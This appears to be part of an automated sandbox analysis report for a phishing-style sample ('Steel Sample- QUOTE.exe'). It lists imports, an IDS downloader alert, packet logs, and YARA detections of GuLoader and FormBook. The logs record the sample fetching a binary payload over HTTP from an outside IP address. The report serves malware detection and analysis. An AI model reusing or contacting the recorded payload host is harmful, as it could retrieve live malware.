| KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
                                          Language of compilation system | Country where language is spoken
                                          English | United States
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2025-03-04T16:54:15.595898+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 63713 | 196.251.86.79 | 80 | TCP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Mar 4, 2025 16:54:16.090112925 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090126038 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090142012 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090167046 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090200901 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090322971 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090333939 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090344906 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090378046 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090409994 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167164087 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167213917 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167272091 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167273045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167273045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167309046 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167346954 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167354107 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167367935 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167408943 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167418003 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167427063 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167443991 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167458057 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167462111 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167479992 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167494059 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167495012 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167510033 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167521954 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167534113 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167538881 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167546988 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167561054 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167566061 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167635918 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167635918 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167860031 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167872906 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167882919 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167896032 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167908907 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167922974 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167949915 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167959929 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168004990 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168005943 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168051958 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168068886 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168082952 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168093920 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168121099 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168154001 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168181896 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168193102 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168207884 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168226004 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168258905 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168271065 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168277025 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168283939 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168299913 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168391943 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168538094 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168550014 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168560028 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168600082 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168637037 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168648005 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168658972 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168670893 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168697119 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168705940 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168706894 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168720007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168740988 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168771982 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168950081 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169011116 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169061899 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169073105 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169084072 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169095039 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169106007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169116020 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169126034 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169137001 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169162035 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169162989 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169162989 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169202089 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172655106 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172673941 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172686100 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172713041 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172729015 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172744989 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172756910 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172806978 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172837973 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172848940 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172857046 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172867060 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172878027 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172883034 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172888041 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172902107 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172910929 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172918081 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172938108 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172952890 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249265909 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249300957 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249320030 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249355078 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249407053 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249428988 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249429941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249449015 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249476910 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249495029 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249501944 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249537945 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249567986 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249619007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249674082 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249708891 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249727964 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249754906 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249761105 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249795914 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249815941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249830961 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249842882 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249866962 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249878883 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249902964 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249917030 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249933958 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249949932 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249969006 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249974012 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250004053 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250015020 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250037909 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250046015 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250072956 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250081062 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250108957 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250123978 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250145912 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250155926 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250176907 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250190973 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250215054 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250264883 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250299931 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250310898 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250349045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250353098 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250386953 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250397921 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250422001 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250433922 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250457048 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250467062 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250500917 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250509024 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250540018 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250551939 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250575066 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250586033 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250610113 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250626087 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250641108 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250654936 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250677109 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250686884 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250714064 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250720024 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250749111 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250761032 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250786066 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250798941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250828981 CET6371380192.168.2.4196.251.86.79
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Mar 4, 2025 16:53:59.426124096 CET | 53 | 60082 | 162.159.36.2 | 192.168.2.4
                                          Mar 4, 2025 16:53:59.918355942 CET | 53 | 56152 | 1.1.1.1 | 192.168.2.4
                                          • 196.251.86.79
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.4 | 63713 | 196.251.86.79 | 80 | 7448 | C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Mar 4, 2025 16:54:14.930927038 CET | 172 | OUT | GET /vHTwkXp255.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                          Host: 196.251.86.79
                                          Cache-Control: no-cache
                                          Mar 4, 2025 16:54:15.595716953 CET | 1236 | IN | HTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Mon, 03 Mar 2025 23:14:59 GMT
                                          Accept-Ranges: bytes
                                          ETag: "80bac315928cdb1:0"
                                          Server: Microsoft-IIS/8.5
                                          Date: Tue, 04 Mar 2025 15:54:15 GMT
                                          Content-Length: 288832


                                          Target ID:0
                                          Start time:10:53:14
                                          Start date:04/03/2025
                                          Path:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
                                          Imagebase:0x400000
                                          File size:684'504 bytes
                                          MD5 hash:1A0611D6FAD6A80C0369A33C2E09F52A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2215456819.0000000005564000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:6
                                          Start time:10:54:05
                                          Start date:04/03/2025
                                          Path:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
                                          Imagebase:0x400000
                                          File size:684'504 bytes
                                          MD5 hash:1A0611D6FAD6A80C0369A33C2E09F52A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2962810507.0000000002234000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Target ID:14
                                          Start time:10:54:38
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\6598NWeXn4d.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:15
                                          Start time:10:54:48
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\Go8zzyHYSzv.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:17
                                          Start time:10:55:00
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\FFwqjpuGr.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:18
                                          Start time:10:55:12
                                          Start date:04/03/2025
                                          Path:C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\XkMQicXLAokJ.exe"
                                          Imagebase:0x1a0000
                                          File size:143'872 bytes
                                          MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false
